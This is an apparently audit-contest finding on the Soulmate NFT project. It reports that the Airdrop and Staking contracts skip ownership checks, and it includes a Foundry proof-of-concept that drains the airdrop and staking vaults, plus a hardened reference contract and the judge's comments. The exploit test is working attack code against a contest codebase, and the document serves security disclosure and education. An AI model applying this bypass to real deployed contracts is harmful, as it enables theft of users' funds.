Contest tags: Beginner Friendly, Foundry, NFT
Submission Details
Severity: high
Valid

User can claim large rewards from Staking contract without owning Soulmate

Summary

Neither Airdrop.sol nor Staking.sol verifies that the caller owns a Soulmate NFT. Any address can therefore claim the airdrop, stake the proceeds and claim staking rewards it is not entitled to.

Vulnerability Details

None of the functions in the sequence below check whether the caller actually owns a Soulmate NFT. An address that has never minted one is treated as the holder of tokenId 0 (the default value returned by the Soulmate contract's owner-to-id lookup), so the whole flow can be run end to end by a non-owner:

  1. Claim the airdrop from Airdrop.sol. This supplies the LoveTokens needed for Staking::deposit().

  2. Approve the Staking contract to transfer those tokens.

  3. Deposit the tokens into the Staking contract.

  4. Claim rewards from the Staking contract.

  5. Withdraw the deposited tokens, keeping the rewards.
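The five steps above as a Foundry test (an added example, not the PoC submitted with this finding). It assumes the contest's test harness, BaseTest.t.sol, which deploys soulmateContract, loveToken, airdropContract, stakingContract and the two vaults; the function names used (ownerToId, idToCreationTimestamp, claim, deposit, claimRewards, withdraw) are those of the 2024-02-soulmate repository as understood here and should be checked against src/ before use.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.23;

// Added example; assumes the contest's BaseTest harness and its public state
// variables (soulmateContract, loveToken, airdropContract, stakingContract).
import {BaseTest} from "./BaseTest.t.sol";

contract NoSoulmateRewardsTest is BaseTest {
    address attacker = makeAddr("attacker");

    function test_attackerWithoutSoulmateDrainsStakingRewards() public {
        // Constructed scenario: the attacker never calls mintSoulmateToken(), so
        // soulmateContract.ownerToId(attacker) is the mapping default, 0, and
        // idToCreationTimestamp(0) is 0 because no couple has been minted.
        // Warp forward so "days in couple" and "weeks staked", both measured
        // from timestamp 0, are large; the exact value only scales the payout.
        vm.warp(block.timestamp + 200 days);
        assertEq(soulmateContract.ownerToId(attacker), 0);
        assertEq(loveToken.balanceOf(attacker), 0);

        vm.startPrank(attacker);

        // Step 1: Airdrop.claim() never checks NFT ownership, so it pays out
        // (block.timestamp - idToCreationTimestamp(0)) / 1 days LoveTokens.
        airdropContract.claim();
        uint256 principal = loveToken.balanceOf(attacker);
        assertGt(principal, 0, "airdrop should have paid a non-owner");

        // Steps 2-3: approve and deposit the airdropped tokens.
        loveToken.approve(address(stakingContract), principal);
        stakingContract.deposit(principal);

        // Step 4: claimRewards() seeds lastClaim from idToCreationTimestamp(0) == 0,
        // so it pays principal * (block.timestamp / 1 weeks) straight from the vault.
        stakingContract.claimRewards();

        // Step 5: pull the principal back out; the rewards stay with the attacker.
        stakingContract.withdraw(principal);
        vm.stopPrank();

        uint256 finalBalance = loveToken.balanceOf(attacker);
        assertGt(finalBalance, principal, "no staking rewards were extracted");
        // Starting from Foundry's default block.timestamp of 1 and warping 200 days:
        // 200e18 principal, 28 whole weeks, 5600e18 in rewards. With a real-world
        // timestamp (about 1.7e9 seconds, roughly 19,700 days / 2,800 weeks) the
        // same flow yields the ~5.5e25 tokens reported above.
    }
}
```

The test only asserts that the attacker ends with more than the airdropped principal, since the absolute amount depends on the chain timestamp the test runs at.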

Impact

Any address, with no Soulmate NFT and no prior LoveToken balance, can claim airdrop tokens and staking rewards it is not entitled to, draining the airdrop and staking vaults. In the attack the balance goes from 0 to 5.5e25 tokens (as shown in the PoC, GitHub link).

Tools Used

Manual Review

Recommendations

First, check in both Airdrop.sol and Staking.sol that the caller actually owns a Soulmate NFT; a lookup that returns tokenId 0 for unknown addresses is not sufficient on its own. Second, keep track of when each user deposits and withdraws tokens in Staking.sol, and accrue rewards only for the time the tokens were actually staked rather than from the couple's creation timestamp.
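One way to implement both recommendations, as an added illustration rather than the project's code: an ownership check that does not trust the ambiguous tokenId 0, and reward accrual that starts at the deposit. The ISoulmate interface below assumes the Soulmate contract exposes soulmateOf(address) and ownerToId(address) as in the contest repository; the contract, error and mapping names are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.23;

// Added example, not the project's Staking.sol. Interface shapes are assumed to
// mirror the Soulmate contest contracts; verify against src/ before reuse.
interface ILoveToken {
    function transfer(address to, uint256 amount) external returns (bool);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface ISoulmate {
    function ownerToId(address owner) external view returns (uint256);
    function soulmateOf(address owner) external view returns (address);
}

contract StakingHardened {
    ILoveToken public immutable loveToken;
    ISoulmate public immutable soulmateContract;
    address public immutable stakingVault;

    mapping(address => uint256) public userStakes;
    // Recommendation 2: per-user accrual clock, seeded at first deposit rather
    // than at the couple's creation timestamp (or 0 for a non-owner).
    mapping(address => uint256) public lastClaim;
    mapping(address => uint256) public pendingRewards;

    error Staking__NotASoulmate();
    error Staking__NothingToClaim();

    constructor(ILoveToken _loveToken, ISoulmate _soulmate, address _stakingVault) {
        loveToken = _loveToken;
        soulmateContract = _soulmate;
        stakingVault = _stakingVault;
    }

    // Recommendation 1: ownerToId(addr) == 0 is ambiguous (the mapping default is
    // also the first couple's id), so require the pairing to round-trip instead.
    modifier onlySoulmate() {
        address partner = soulmateContract.soulmateOf(msg.sender);
        if (partner == address(0) || soulmateContract.soulmateOf(partner) != msg.sender) {
            revert Staking__NotASoulmate();
        }
        _;
    }

    // Credit whole weeks elapsed on the *current* stake, then advance the clock by
    // exactly those weeks so the partial week is carried over, not lost.
    function _accrue(address user) internal {
        if (lastClaim[user] == 0) {
            lastClaim[user] = block.timestamp;
            return;
        }
        uint256 weeksElapsed = (block.timestamp - lastClaim[user]) / 1 weeks;
        if (weeksElapsed == 0) return;
        pendingRewards[user] += userStakes[user] * weeksElapsed;
        lastClaim[user] += weeksElapsed * 1 weeks;
    }

    function deposit(uint256 amount) external onlySoulmate {
        _accrue(msg.sender);            // settle before the stake changes
        userStakes[msg.sender] += amount;
        loveToken.transferFrom(msg.sender, address(this), amount);
    }

    // Withdrawal is deliberately not gated: principal must stay recoverable
    // even if the pairing later ends.
    function withdraw(uint256 amount) external {
        _accrue(msg.sender);            // settle before the stake changes
        userStakes[msg.sender] -= amount;
        loveToken.transfer(msg.sender, amount);
    }

    function claimRewards() external onlySoulmate {
        _accrue(msg.sender);
        uint256 amountToClaim = pendingRewards[msg.sender];
        if (amountToClaim == 0) revert Staking__NothingToClaim();
        pendingRewards[msg.sender] = 0;
        loveToken.transferFrom(stakingVault, msg.sender, amountToClaim);
    }
}
```

Settling rewards inside deposit and withdraw closes the related problem of a tiny early deposit "seeding" the clock so that a later large deposit is rewarded for weeks it was never staked.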

Updates

Lead Judging Commences

0xnevi (Lead Judge), over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-claim-airdrop-without-owning-NFT

High severity. This issue is separated from the flawed `isDivorced()` check presented in issue #168 as, even if that is fixed, if ownership is not checked, `isDivorced` would still default to false and allow bypass to claim airdrops by posing as tokenId 0, in turn resulting in this [important check for token claim being bypassed.](https://github.com/Cyfrin/2024-02-soulmate/blob/b3f9227942ffd5c443ce6bccaa980fea0304c38f/src/Airdrop.sol#L61-L66) #220 is the most comprehensive issue as it correctly recognizes both issues existing within the same function.
